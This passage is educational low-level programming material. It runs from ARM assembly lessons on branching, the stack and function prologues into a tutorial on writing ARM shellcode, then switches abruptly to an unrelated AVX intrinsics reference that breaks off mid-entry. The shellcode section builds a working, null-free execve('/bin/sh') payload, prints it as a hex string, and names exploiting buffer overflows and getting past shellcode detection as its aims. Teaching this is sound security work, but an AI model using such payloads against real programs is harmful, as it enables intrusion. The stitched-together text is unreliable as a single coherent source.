       return a;
    }

    B / BX / BLX

    There are three types of branching instructions:

    • Branch (B)
      • Simple jump to a function
    • Branch link (BL)
      • Saves (PC+4) in LR and jumps to function
    • Branch exchange (BX) and Branch link exchange (BLX)
      • Same as B/BL + exchange instruction set (ARM <-> Thumb)
      • Needs a register as first operand: BX/BLX reg

    BX/BLX is used to exchange the instruction set from ARM to Thumb.

    .text
    .global _start
    
    _start:
         .code 32         @ ARM mode
         add r2, pc, #1   @ put PC+1 into R2
         bx r2            @ branch + exchange to R2
    
        .code 16          @ Thumb mode
         mov r0, #1

    The trick here is to take the current value of the actual PC, increase it by 1, store the result in a register, and branch (+ exchange) to that register. We see that the addition (add r2, pc, #1) simply takes the effective PC address (which is the current instruction’s address + 8 -> 0x805C) and adds 1 to it (0x805C + 1 = 0x805D). The exchange then happens because the Least Significant Bit (LSB) of the address we branch to is 1 (0x805D = 10000000 01011101 in binary), meaning the address is not 4-byte aligned. Branching to such an address won’t cause any misalignment issues, because the processor only uses the LSB to select the instruction set and clears it before fetching. This is how it looks in GDB (with the GEF extension):

    Please note that the GIF above was created using the older version of GEF so it’s very likely that you see a slightly different UI and different offsets. Nevertheless, the logic is the same.

    Conditional Branches

    Branches can also be executed conditionally and used for branching to a function only if a specific condition is met. Let’s look at a very simple example of a conditional branch using BEQ. This piece of assembly does nothing interesting other than moving values into registers and branching to another function if a register is equal to a specified value.

    .text
    .global _start
    
    _start:
       mov r0, #2
       mov r1, #2
       add r0, r0, r1
       cmp r0, #4
       beq func1
       add r1, #5
       b func2
    func1:
       mov r1, r0
       bx  lr
    func2:
       mov r0, r1
       bx  lr

    STACK AND FUNCTIONS

    In this part we will look into a special memory region of the process called the Stack. This chapter covers the Stack’s purpose and the operations related to it. Additionally, we will go through the implementation, types and differences of functions in ARM.

    STACK

    Generally speaking, the Stack is a memory region within the program/process. This part of the memory gets allocated when a process is created. We use the Stack for storing temporary data such as local variables of some function, environment variables which help us to transition between functions, etc. We interact with the Stack using the PUSH and POP instructions. As explained in Memory Instructions: Load and Store, PUSH and POP are aliases for other memory-related instructions rather than real instructions, but we use PUSH and POP for simplicity reasons.

    Before we look into a practical example, it is important for us to know that the Stack can be implemented in various ways. First, when we say that the Stack grows, we mean that an item (32 bits of data) is put onto the Stack. The Stack can grow UP (when the stack is implemented in a Descending fashion) or DOWN (when the stack is implemented in an Ascending fashion). The actual location where the next (32-bit) piece of information will be put is defined by the Stack Pointer, or, to be precise, the memory address stored in the SP register. Here again, the address could be pointing to the current (last) item on the stack or to the next available memory slot for an item. If the SP is currently pointing to the last item on the stack (Full stack implementation), the SP will be decreased (in case of a Descending Stack) or increased (in case of an Ascending Stack) and only then will the item be placed on the Stack. If the SP is currently pointing to the next empty slot on the Stack, the data will be placed first and only then will the SP be decreased (Descending Stack) or increased (Ascending Stack).

     

    As a summary of different Stack implementations we can use the following table which describes which Store Multiple/Load Multiple instructions are used in different cases.
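
    Stack type          PUSH (store multiple)    POP (load multiple)
    Full descending     STMFD (= STMDB)          LDMFD (= LDMIA)
    Full ascending      STMFA (= STMIB)          LDMFA (= LDMDA)
    Empty descending    STMED (= STMDA)          LDMED (= LDMIB)
    Empty ascending     STMEA (= STMIA)          LDMEA (= LDMDB)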

    In our examples we will use the Full Descending Stack. Let’s take a quick look at a simple exercise which deals with such a Stack and its Stack Pointer.

    /* azeria@labs:~$ as stack.s -o stack.o && gcc stack.o -o stack && gdb stack */
    .global main
    
    main:
         mov   r0, #2  /* set up r0 */
         push  {r0}    /* save r0 onto the stack */
         mov   r0, #3  /* overwrite r0 */
         pop   {r0}    /* restore r0 to its initial state */
         bx    lr      /* finish the program */

    At the beginning, the Stack Pointer points to address 0xbefff6f8 (could be different in your case), which represents the last item in the Stack. At this moment, we see that it stores some value (again, the value can be different in your case):

    gef> x/1x $sp
    0xbefff6f8: 0xb6fc7000

    After executing the first (MOV) instruction, nothing changes in terms of the Stack. When we execute the PUSH instruction, the following happens: first, the value of SP is decreased by 4 (4 bytes = 32 bits). Then, the contents of R0 are stored to the new address specified by SP. When we now examine the updated memory location referenced by SP, we see that a 32 bit value of integer 2 is stored at that location:

    gef> x/x $sp
    0xbefff6f4: 0x00000002

    The instruction (MOV r0, #3) in our example is used to simulate the corruption of the R0. We then use POP to restore a previously saved value of R0. So when the POP gets executed, the following happens: first, 32 bits of data are read from the memory location (0xbefff6f4) currently pointed by the address in SP. Then, the SP register’s value is increased by 4 (becomes 0xbefff6f8 again). The register R0 contains integer value 2 as a result.

    gef> info registers r0
    r0       0x2          2

    (Please note that the following gif shows the stack having the lower addresses at the top and the higher addresses at the bottom, rather than the other way around like in the first illustration of different Stack variations. The reason for this is to make it look like the Stack view you see in GDB)

    We will see that functions take advantage of the Stack for saving local variables, preserving register state, etc. To keep everything organized, functions use Stack Frames, a localized memory portion within the Stack which is dedicated to a specific function. A stack frame gets created in the prologue (more about this in the next section) of a function. The Frame Pointer (FP) is set to the bottom of the stack frame, and then the stack buffer for the Stack Frame is allocated. The stack frame (starting from its bottom) generally contains the return address (previous LR), the previous Frame Pointer, any registers that need to be preserved, function parameters (in case the function accepts more than 4), local variables, etc. While the actual contents of the Stack Frame may vary, the ones outlined above are the most common. Finally, the Stack Frame gets destroyed during the epilogue of a function.

    Here is an abstract illustration of a Stack Frame within the stack:

    As a quick example of a Stack Frame visualization, let’s use this piece of code:

    /* azeria@labs:~$ gcc func.c -o func && gdb func */
    int main()
    {
     int res = 0;
     int a = 1;
     int b = 2;
     res = max(a, b);
     return res;
    }
    
    int max(int a,int b)
    {
     do_nothing();
     if(a<b)
     {
     return b;
     }
     else
     {
     return a;
     }
    }
    int do_nothing()
    {
     return 0;
    }

    In the screenshot below we can see a simple illustration of a Stack Frame through the perspective of GDB debugger.

    We can see in the picture above that currently we are about to leave the function max (see the arrow in the disassembly at the bottom). At this state, the FP (R11) points to 0xbefff254 which is the bottom of our Stack Frame. This address on the Stack (green addresses) stores 0x00010418 which is the return address (previous LR). 4 bytes above this (at 0xbefff250) we have a value 0xbefff26c, which is the address of a previous Frame Pointer. The 0x1 and 0x2 at addresses 0xbefff24c and 0xbefff248 are local variables which were used during the execution of the function max. So the Stack Frame which we just analyzed had only LR, FP and two local variables.

    FUNCTIONS

    To understand functions in ARM we first need to get familiar with the structural parts of a function, which are:

    1. Prologue
    2. Body
    3. Epilogue

    The purpose of the prologue is to save the previous state of the program (by storing values of LR and R11 onto the Stack) and set up the Stack for the local variables of the function. While the implementation of the prologue may differ depending on a compiler that was used, generally this is done by using PUSH/ADD/SUB instructions. An example of a prologue would look like this:

    push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack. This also allocates space for the Stack Frame */

    The body part of the function is usually responsible for some kind of unique and specific task. This part of the function may contain various instructions, branches (jumps) to other functions, etc. An example of a body section of a function can be as simple as the following few instructions:

    mov    r0, #1       /* setting up local variables (a=1). This also serves as setting up the first parameter for the function max */
    mov    r1, #2       /* setting up local variables (b=2). This also serves as setting up the second parameter for the function max */
    bl     max          /* Calling/branching to function max */

    The sample code above shows a snippet of a function which sets up local variables and then branches to another function. This piece of code also shows us that the parameters of a function (in this case the function max) are passed via registers. In some cases, when there are more than 4 parameters to be passed, we additionally use the Stack to store the remaining parameters. It is also worth mentioning that the result of a function is returned via the register R0. So whatever the result of a function (max) turns out to be, we should be able to pick it up from the register R0 right after the return from the function. One more thing to point out is that in certain situations the result might be 64 bits in length (exceeding the size of a 32-bit register). In that case we can use R0 combined with R1 to return a 64-bit result.
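
    As a rough sketch (the function name and argument values below are made up for illustration), a call that passes five parameters places the first four in R0-R3 and the fifth on the Stack:

    mov    r0, #1            /* 1st parameter -> r0 */
    mov    r1, #2            /* 2nd parameter -> r1 */
    mov    r2, #3            /* 3rd parameter -> r2 */
    mov    r3, #4            /* 4th parameter -> r3 */
    mov    r4, #5
    push   {r4}              /* 5th parameter goes onto the Stack */
    bl     func_with_5_args  /* result comes back in r0 (r0 and r1 for a 64-bit result) */
    add    sp, sp, #4        /* the caller removes the stacked parameter again */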

    The last part of the function, the epilogue, is used to restore the program’s state to its initial one (before the function call) so that it can continue from where it left off. For that we need to readjust the Stack Pointer. This is done by using the Frame Pointer register (R11) as a reference and performing an add or sub operation. Once we have readjusted the Stack Pointer, we restore the previously (in the prologue) saved register values by popping them off the Stack into the respective registers. Depending on the function type, the POP instruction might be the final instruction of the epilogue. However, it might be that after restoring the register values we use a BX instruction to leave the function. An example of an epilogue looks like this:

    sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11, pc}    /* End of the epilogue. Restoring Frame Pointer from the Stack, jumping to previously saved LR via direct load into PC. The Stack Frame of a function is finally destroyed at this step. */

    So now we know that:

    1. Prologue sets up the environment for the function;
    2. Body implements the function’s logic and stores result to R0;
    3. Epilogue restores the state so that the program can resume from where it left off before calling the function.

    Another key point to know about functions is their types: leaf and non-leaf. A leaf function is a function which does not call/branch to another function from within itself. A non-leaf function is a function which, in addition to its own logic, does call/branch to another function. The implementation of these two kinds of functions is similar. However, they have some differences. To analyze the differences between these functions we will use the following piece of code:

    /* azeria@labs:~$ as func.s -o func.o && gcc func.o -o func && gdb func */
    .global main
    
    main:
    	push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    	add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    	sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack */
    	mov    r0, #1       /* setting up local variables (a=1). This also serves as setting up the first parameter for the max function */
    	mov    r1, #2       /* setting up local variables (b=2). This also serves as setting up the second parameter for the max function */
    	bl     max          /* Calling/branching to function max */
    	sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    	pop    {r11, pc}    /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */
    
    max:
    	push   {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    	add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    	sub    sp, sp, #12  /* End of the prologue. Allocating some buffer on the stack */
    	cmp    r0, r1       /* Implementation of if(a<b) */
    	movlt  r0, r1       /* if r0 was lower than r1, store r1 into r0 */
    	add    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    	pop    {r11}        /* restoring frame pointer */
    	bx     lr           /* End of the epilogue. Jumping back to main via LR register */

    The example above contains two functions: main, which is a non-leaf function, and max, a leaf function. As mentioned before, a non-leaf function calls/branches to another function, which is true in our case, because we branch to the function max from the function main. The function max in this case does not branch to another function within its body, which makes it a leaf function.

    Another key difference is the way the prologues and epilogues are implemented. The following example shows a comparison of the prologues of a non-leaf and a leaf function:

    /* A prologue of a non-leaf function */
    push   {r11, lr}    /* Start of the prologue. Saving Frame Pointer and LR onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #16  /* End of the prologue. Allocating some buffer on the stack */
    
    /* A prologue of a leaf function */
    push   {r11}        /* Start of the prologue. Saving Frame Pointer onto the stack */
    add    r11, sp, #0  /* Setting up the bottom of the stack frame */
    sub    sp, sp, #12  /* End of the prologue. Allocating some buffer on the stack */

    The main difference here is that the prologue of the non-leaf function saves more registers onto the stack. The reason behind this is that, by the nature of a non-leaf function, the LR gets modified during its execution, and therefore the value of this register needs to be preserved so that it can be restored later. Generally, the prologue could save even more registers if necessary.

    The comparison of the epilogues of the leaf and non-leaf functions, which we see below, shows us that the program’s flow is controlled in different ways: by branching to the address stored in the LR register in the leaf function’s case, and by a direct POP into the PC register in the non-leaf function’s case.

     /* An epilogue of a leaf function */
    add    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11}        /* restoring frame pointer */
    bx     lr           /* End of the epilogue. Jumping back to main via LR register */
    
    /* An epilogue of a non-leaf function */
    sub    sp, r11, #0  /* Start of the epilogue. Readjusting the Stack Pointer */
    pop    {r11, pc}    /* End of the epilogue. Restoring Frame pointer from the stack, jumping to previously saved LR via direct load into PC */

    Finally, it is important to understand the use of the BL and BX instructions here. In our example, we branched to the leaf function by using a BL instruction. We use the label of a function as a parameter to initiate the branch. During the compilation process, the label gets replaced with a memory address. Before jumping to that location, the address of the next instruction is saved (linked) to the LR register so that we can return to where we left off when the function max is finished.

    The BX instruction, which is used to leave the leaf function, takes the LR register as a parameter. As mentioned earlier, before jumping to the function max, the BL instruction saved the address of the next instruction of the function main into the LR register. Because a leaf function is not supposed to change the value of the LR register during its execution, this register can now be used to return to the parent (main) function. As explained in the previous chapter, the BX instruction can eXchange between ARM/Thumb modes during a branch operation. In this case, it is done by inspecting the last bit of the LR register: if the bit is set to 1, the CPU will change (or keep) the mode to Thumb; if it’s set to 0, the mode will be changed (or kept) to ARM. This is a nice design feature which allows us to call functions from different modes.

    To take another perspective into functions and their internals we can examine the following animation which illustrates the inner workings of non-leaf and leaf functions.

FURTHER READING

1. Whirlwind Tour of ARM Assembly.
https://www.coranac.com/tonc/text/asm.htm

2. ARM assembler in Raspberry Pi.
http://thinkingeek.com/arm-assembler-raspberry-pi/

3. Practical Reverse Engineering: x86, x64, ARM, Windows Kernel, Reversing Tools, and Obfuscation by Bruce Dang, Alexandre Gazet, Elias Bachaalany and Sebastien Josse.

4. ARM Reference Manual.
http://infocenter.arm.com/help/topic/com.arm.doc.dui0068b/index.html

5. Assembler User Guide.
http://www.keil.com/support/man/docs/armasm/default.htm

WRITING ARM SHELLCODE

INTRODUCTION TO WRITING ARM SHELLCODE

 

This tutorial is for people who think beyond running automated shellcode generators and want to learn how to write shellcode in ARM assembly themselves. After all, knowing how it works under the hood and having full control over the result is much more fun than simply running a tool, isn’t it? Writing your own shellcode in assembly is a skill that can turn out to be very useful in scenarios where you need to bypass shellcode-detection algorithms or other restrictions where automated tools could turn out to be insufficient. The good news is, it’s a skill that can be learned quite easily once you are familiar with the process.

For this tutorial we will use the following tools (most of them should be installed by default on your Linux distribution):

  • GDB – our debugger of choice
  • GEF –  GDB Enhanced Features, highly recommended (created by @_hugsy_)
  • GCC – Gnu Compiler Collection
  • as – assembler
  • ld – linker
  • strace – utility to trace system calls
  • objdump – to check for null-bytes in the disassembly
  • objcopy – to extract raw shellcode from ELF binary

Make sure you compile and run all the examples in this tutorial in an ARM environment.

Before you start writing your shellcode, make sure you are aware of some basic principles, such as:

  1. You want your shellcode to be compact and free of null-bytes
    • Reason: We are writing shellcode that we will use to exploit memory corruption vulnerabilities like buffer overflows. Some buffer overflows occur because of the use of the C function ‘strcpy’. Its job is to copy data until it receives a null-byte. We use the overflow to take control over the program flow and if strcpy hits a null-byte it will stop copying our shellcode and our exploit will not work.
  2. You also want to avoid library calls and absolute memory addresses
    • Reason: To make our shellcode as universal as possible, we can’t rely on library calls that require specific dependencies and absolute memory addresses that depend on specific environments.

The Process of writing shellcode involves the following steps:

  1. Knowing what system calls you want to use
  2. Figuring out the syscall number and the parameters your chosen syscall function requires
  3. De-Nullifying your shellcode
  4. Converting your shellcode into a Hex string

UNDERSTANDING SYSTEM FUNCTIONS

Before diving into our first shellcode, let’s write a simple ARM assembly program that outputs a string. The first step is to look up the system call we want to use, which in this case is “write”. The prototype of this system call can be looked up in the Linux man pages:

ssize_t write(int fd, const void *buf, size_t count);

From the perspective of a high level programming language like C, the invocation of this system call would look like the following:

const char string[13] = "Azeria Labs\n";
write(1, string, sizeof(string));        // Here sizeof(string) is 13

Looking at this prototype, we can see that we need the following parameters:

  • fd – 1 for STDOUT
  • buf – pointer to a string
  • count – number of bytes to write -> 13
  • syscall number of write -> 0x4

For the first 3 parameters we can use R0, R1, and R2. For the syscall we need to use R7 and move the number 0x4 into it.

mov   r0, #1      @ fd 1 = STDOUT
ldr   r1, string  @ loading the string from memory to R1
mov   r2, #13     @ write 13 bytes to STDOUT 
mov   r7, #4      @ Syscall 0x4 = write()
svc   #0

Using the snippet above, a functional ARM assembly program would look like the following:

.data
string: .asciz "Azeria Labs\n"  @ .asciz adds a null-byte to the end of the string
after_string:
.set size_of_string, after_string - string

.text
.global _start

_start:
   mov r0, #1               @ STDOUT
   ldr r1, addr_of_string   @ memory address of string
   mov r2, #size_of_string  @ size of string
   mov r7, #4               @ write syscall
   swi #0                   @ invoke syscall

_exit:
   mov r7, #1               @ exit syscall
   swi 0                    @ invoke syscall

addr_of_string: .word string

In the data section we calculate the size of our string by subtracting the address at the beginning of the string from the address after the string. This, of course, would not be necessary if we simply calculated the string size manually and put the result directly into R2. To exit our program we use the system call exit(), which has the syscall number 1.

Compile and execute:

azeria@labs:~$ as write.s -o write.o && ld write.o -o write
azeria@labs:~$ ./write
Azeria Labs

Cool. Now that we know the process, let’s look into it in more detail and write our first simple shellcode in ARM assembly.

1. TRACING SYSTEM CALLS

For our first example we will take the following simple function and transform it into ARM assembly:

#include <stdio.h>

void main(void)
{
    system("/bin/sh");
}

The first step is to figure out what system calls this function invokes and what parameters are required by the system call. With ‘strace’ we can monitor our program’s system calls to the Kernel of the OS.

Save the code above in a file and compile it before running the strace command on it.

azeria@labs:~$ gcc system.c -o system
azeria@labs:~$ strace -h
-f -- follow forks, -ff -- with output into separate files
-v -- verbose mode: print unabbreviated argv, stat, termio[s], etc. args
--- snip --
azeria@labs:~$ strace -f -v system
--- snip --
[pid 4575] execve("/bin/sh", ["/bin/sh"], ["MAIL=/var/mail/pi", "SSH_CLIENT=192.168.200.1 42616 2"..., "USER=pi", "SHLVL=1", "OLDPWD=/home/azeria", "HOME=/home/azeria", "XDG_SESSION_COOKIE=34069147acf8a"..., "SSH_TTY=/dev/pts/1", "LOGNAME=pi", "_=/usr/bin/strace", "TERM=xterm", "PATH=/usr/local/sbin:/usr/local/"..., "LANG=en_US.UTF-8", "LS_COLORS=rs=0:di=01;34:ln=01;36"..., "SHELL=/bin/bash", "EGG=AAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., "LC_ALL=en_US.UTF-8", "PWD=/home/azeria/", "SSH_CONNECTION=192.168.200.1 426"...]) = 0
--- snip --
[pid 4575] write(2, "$ ", 2$ ) = 2
[pid 4575] read(0, exit
--- snip --
exit_group(0) = ?
+++ exited with 0 +++

Turns out, the system function execve() is being invoked.

2. SYSCALL NUMBER AND PARAMETERS

The next step is to figure out the syscall number of execve() and the parameters this function requires. You can get a nice overview of system calls at w3calls or by searching through Linux man pages. Here’s what we get from the man page of execve():

NAME
    execve - execute program
SYNOPSIS

    #include <unistd.h>

    int  execve(const char *filename, char *const argv [], char *const envp[]);

The parameters execve() requires are:

  • Pointer to a string specifying the path to a binary
  • argv[] – array of command line variables
  • envp[] – array of environment variables

Which basically translates to: execve(*filename, *argv[], *envp[]) –> execve(*filename, 0, 0). The system call number of this function can be looked up with the following command:

azeria@labs:~$ grep execve /usr/include/arm-linux-gnueabihf/asm/unistd.h 
#define __NR_execve (__NR_SYSCALL_BASE+ 11)

Looking at the output you can see that the syscall number of execve() is 11. Registers R0 to R2 can be used for the function parameters and register R7 will store the syscall number.

Invoking system calls on x86 works as follows: First, you PUSH parameters on the stack. Then, the syscall number gets moved into EAX (MOV EAX, syscall_number). And lastly, you invoke the system call with SYSENTER / INT 80.

On ARM, syscall invocation works a little bit differently:

  1. Move parameters into registers – R0, R1, ..
  2. Move the syscall number into register R7
    • mov  r7, #<syscall_number>
  3. Invoke the system call with
    • SVC #0 or
    • SVC #1
  4. The return value ends up in R0

This is how it looks in ARM assembly (the code is uploaded to the azeria-labs Github account):
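
A minimal version of that program, reconstructed here from the disassembly shown below, looks like this:

.text
.global _start

_start:
   add r0, pc, #12   @ r0 -> "/bin/sh" (PC-relative: effective PC is two instructions ahead)
   mov r1, #0        @ argv = 0
   mov r2, #0        @ envp = 0
   mov r7, #11       @ syscall number of execve()
   svc #0            @ invoke the syscall

.ascii "/bin/sh\0"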

As you can see in the code above, we start by pointing R0 to our “/bin/sh” string using PC-relative addressing (if you can’t remember why the effective PC starts two instructions ahead of the current one, go to ‘Data Types and Registers’ of the assembly basics tutorial and look at the part where the PC register is explained along with an example). Then we move 0’s into R1 and R2 and move the syscall number 11 into R7. Looks easy, right? Let’s look at the disassembly of our first attempt using objdump:

azeria@labs:~$ as execve1.s -o execve1.o
azeria@labs:~$ objdump -d execve1.o
execve1.o: file format elf32-littlearm

Disassembly of section .text:

00000000 <_start>:
 0: e28f000c add r0, pc, #12
 4: e3a01000 mov r1, #0
 8: e3a02000 mov r2, #0
 c: e3a0700b mov r7, #11
 10: ef000000 svc 0x00000000
 14: 6e69622f .word 0x6e69622f
 18: 0068732f .word 0x0068732f

Turns out we have quite a lot of null-bytes in our shellcode. The next step is to de-nullify the shellcode and replace all instructions that produce them.

3. DE-NULLIFYING SHELLCODE

One of the techniques we can use to make null-bytes less likely to appear in our shellcode is to use Thumb mode. Using Thumb mode decreases the chances of having null-bytes, because Thumb instructions are 2 bytes long instead of 4. If you went through the ARM Assembly Basics tutorials, you know how to switch from ARM to Thumb mode. If you haven’t, I encourage you to read the chapter about the branching instructions “B / BX / BLX” in part 6 of the tutorial, “Conditional Execution and Branching”.

In our second attempt we use Thumb mode and replace the operations containing #0’s with operations that result in 0’s by subtracting registers from each other or xor’ing them. For example, instead of using “mov  r1, #0”, use either “sub  r1, r1, r1” (r1 = r1 – r1) or “eor  r1, r1, r1” (r1 = r1 xor r1). Keep in mind that since we are now using Thumb mode (2 byte instructions) and our code must be 4 byte aligned, we need to add a NOP at the end (e.g. mov  r5, r5).

(Code available on the azeria-labs Github account):
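
The exact listing is in that repository; a sketch of this second attempt, applying the Thumb-mode substitutions described above (instruction order and register choices here are illustrative), could look like this:

.text
.global _start

_start:
   .code 32
   add r3, pc, #1   @ r3 = pc + 1, LSB set
   bx  r3           @ switch to Thumb state

   .code 16
   add r0, pc, #8   @ r0 -> "/bin/sh" string below
   sub r1, r1, r1   @ r1 = 0 without using the immediate #0
   sub r2, r2, r2   @ r2 = 0 without using the immediate #0
   mov r7, #11      @ syscall number of execve()
   svc #1           @ invoke the syscall
   mov r5, r5       @ NOP to keep the code 4-byte aligned

.ascii "/bin/sh\0"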

The disassembled code looks like the following:

The result is that we only have one single null-byte that we need to get rid of. The part of our code that’s causing the null-byte is the null-terminated string “/bin/sh\0”. We can solve this issue with the following technique:

  • Replace “/bin/sh\0” with “/bin/shX”
  • Use the instruction strb (store byte) in combination with an existing zero-filled register to replace X with a null-byte

(Code available on the azeria-labs Github account):
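
Decoding the final hex string shown further below, the de-nullified version looks roughly like this:

.text
.global _start

_start:
   .code 32
   add r3, pc, #1     @ switch to Thumb state
   bx  r3

   .code 16
   add  r0, pc, #8    @ r0 -> "/bin/shX"
   eor  r1, r1        @ r1 = 0
   eor  r2, r2        @ r2 = 0
   strb r2, [r0, #7]  @ replace the X with a null-byte at runtime
   mov  r7, #11       @ syscall number of execve()
   svc  #1            @ invoke the syscall

.ascii "/bin/shX"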

Voilà – no null-bytes!

4. TRANSFORM SHELLCODE INTO HEX STRING

The shellcode we created can now be transformed into its hexadecimal representation. Before doing that, it is a good idea to check that the shellcode works standalone. But there’s a problem: if we compile our assembly file like we normally would, it won’t work. The reason for this is that we use the strb instruction to modify our code section (.text). This requires the code section to be writable, which can be achieved by adding the -N flag during the linking process.

azeria@labs:~$ ld --help
--- snip --
-N, --omagic        Do not page align data, do not make text readonly.
--- snip -- 
azeria@labs:~$ as execve3.s -o execve3.o && ld -N execve3.o -o execve3
azeria@labs:~$ ./execve3
$ whoami
azeria

It works! Congratulations, you’ve written your first shellcode in ARM assembly.

To convert it into hex, use the following commands:

azeria@labs:~$ objcopy -O binary execve3 execve3.bin 
azeria@labs:~$ hexdump -v -e '"\\""x" 1/1 "%02x" ""' execve3.bin 
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78

Instead of using the hexdump command above, you can also do the same with a simple Python 2 script:

#!/usr/bin/env python

import sys

binary = open(sys.argv[1],'rb')

for byte in binary.read():
 sys.stdout.write("\\x"+byte.encode("hex"))

print ""
azeria@labs:~$ ./shellcode.py execve3.bin
\x01\x30\x8f\xe2\x13\xff\x2f\xe1\x02\xa0\x49\x40\x52\x40\xc2\x71\x0b\x27\x01\xdf\x2f\x62\x69\x6e\x2f\x73\x68\x78

I hope you enjoyed this introduction to writing ARM shellcode. In the next part you will learn how to write shellcode in the form of a reverse shell, which is a little more complicated than the example above. After that we will dive into memory corruptions and learn how they occur and how to exploit them using our self-made shellcode.

AVX (Advanced Vector Extensions) is an extension to the x86 instruction set architecture for Intel and AMD microprocessors.

AVX provides various improvements, new instructions and a new machine-code encoding scheme.

Improvements

  • A new VEX instruction-encoding scheme.
  • The width of the SIMD vector registers is increased from 128 bits (XMM) to 256 bits (registers YMM0 - YMM15). Existing 128-bit SSE instructions use the lower half of the new YMM registers without changing the upper part. New 256-bit AVX instructions are added for working with the YMM registers. In the future the SIMD vector registers may be extended to 512 or 1024 bits. For example, processors with the Xeon Phi architecture already had 512-bit vector registers (ZMM) in 2012 and use SIMD instructions with MVEX and VEX prefixes to work with them, but they do not support AVX.
  • Non-destructive operations. The AVX instruction set uses a three-operand syntax. For example, instead of a = a + b one can write c = a + b, leaving the register a unchanged. In cases where the value of a is used in further computations this improves performance, since it removes the need to save the register containing a before the computation and restore it afterwards from another register or from memory.
  • For most of the new instructions there are no alignment requirements for memory operands. However, it is recommended to keep operands aligned to the operand size to avoid a significant drop in performance.
  • The AVX instruction set contains 128-bit counterparts of the SSE instructions for floating-point numbers. Unlike the originals, storing a 128-bit result zeroes the upper half of the YMM register. The 128-bit AVX instructions keep the other advantages of AVX, such as the new encoding scheme, the three-operand syntax and unaligned memory access.
  • Intel recommends abandoning the old SSE instructions in favour of the new 128-bit AVX instructions, even when two operands are enough.

New encoding scheme

The new VEX instruction-encoding scheme uses a VEX prefix. There are currently two VEX prefixes, 2 and 3 bytes long. For the 2-byte VEX prefix the first byte is 0xC5; for the 3-byte prefix it is 0xC4.

In 64-bit mode the first byte of the VEX prefix is unique. In 32-bit mode it conflicts with the LES and LDS instructions; the conflict is resolved via the most significant bit of the second byte, which is only meaningful in 64-bit mode, by going through otherwise unsupported forms of the LES and LDS instructions.

Including the VEX prefix, existing AVX instructions are at most 11 bytes long. Longer instructions are expected to appear in future versions.

New instructions

Instruction Description
VBROADCASTSS, VBROADCASTSD, VBROADCASTF128 Copies a 32-, 64- or 128-bit memory operand into all elements of an XMM or YMM vector register.
VINSERTF128 Replaces the lower or upper half of a 256-bit YMM register with the value of a 128-bit operand. The other half of the destination register is left unchanged.
VEXTRACTF128 Extracts the lower or upper half of a 256-bit YMM register and copies it into a 128-bit destination operand.
VMASKMOVPS, VMASKMOVPD Conditionally reads any number of elements from a vector memory operand into a destination register, leaving the remaining elements unread and zeroing the corresponding elements of the destination register. Can also conditionally write any number of elements from a vector register into a vector memory operand, leaving the remaining elements of the memory operand unchanged.
VPERMILPS, VPERMILPD Permutes the 32- or 64-bit elements of a vector according to a selector operand (from memory or from a register).
VPERM2F128 Shuffles the four 128-bit elements of two 256-bit registers into a 256-bit destination operand, using an immediate constant (imm) as the selector.
VZEROALL Zeroes all YMM registers and marks them as unused. Used when switching between 128-bit and 256-bit modes.
VZEROUPPER Zeroes the upper halves of all YMM registers. Used when switching between 128-bit and 256-bit modes.

The AVX specification also describes the PCLMUL group of instructions (Parallel Carry-Less Multiplication, Parallel CLMUL):

  • PCLMULLQLQDQ xmmreg, xmmrm [rm: 66 0f 3a 44 /r 00]
  • PCLMULHQLQDQ xmmreg, xmmrm [rm: 66 0f 3a 44 /r 01]
  • PCLMULLQHQDQ xmmreg, xmmrm [rm: 66 0f 3a 44 /r 02]
  • PCLMULHQHQDQ xmmreg, xmmrm [rm: 66 0f 3a 44 /r 03]
  • PCLMULQDQ xmmreg, xmmrm, imm [rmi: 66 0f 3a 44 /r ib]

Applications

AVX is well suited for floating-point-intensive computations in multimedia software and scientific workloads. Where a higher degree of parallelism is available, it increases performance on floating-point data.

Instructions and examples

__m256i _mm256_abs_epi16 (__m256i a)

Synopsis

__m256i _mm256_abs_epi16 (__m256i a)
#include <immintrin.h>
Instruction: vpabsw ymm, ymm
CPUID Flags: AVX2

Description

Compute the absolute value of packed 16-bit integers in a, and store the unsigned results in dst.

Operation

FOR j := 0 to 15
    i := j*16
    dst[i+15:i] := ABS(a[i+15:i])
ENDFOR
dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpabsd
__m256i _mm256_abs_epi32 (__m256i a)

Synopsis

__m256i _mm256_abs_epi32 (__m256i a)
#include <immintrin.h>
Instruction: vpabsd ymm, ymm
CPUID Flags: AVX2

Description

Compute the absolute value of packed 32-bit integers in a, and store the unsigned results in dst.

Operation

FOR j := 0 to 7
    i := j*32
    dst[i+31:i] := ABS(a[i+31:i])
ENDFOR
dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpabsb
__m256i _mm256_abs_epi8 (__m256i a)

Synopsis

__m256i _mm256_abs_epi8 (__m256i a)
#include <immintrin.h>
Instruction: vpabsb ymm, ymm
CPUID Flags: AVX2

Description

Compute the absolute value of packed 8-bit integers in a, and store the unsigned results in dst.

Operation

FOR j := 0 to 31
    i := j*8
    dst[i+7:i] := ABS(a[i+7:i])
ENDFOR
dst[MAX:256] := 0

Performance

Architecture Latency Throughput
Haswell 1
vpaddw
__m256i _mm256_add_epi16 (__m256i a, __m256i b)

Synopsis

__m256i _mm256_add_epi16 (__m256i a, __m256i b)
#include <immintrin.h>
Instruction: vpaddw ymm, ymm, ymm
CPUID Flags: AVX2

Description

Add packed 16-bit integers in a and b, and store the results in dst.

Operation
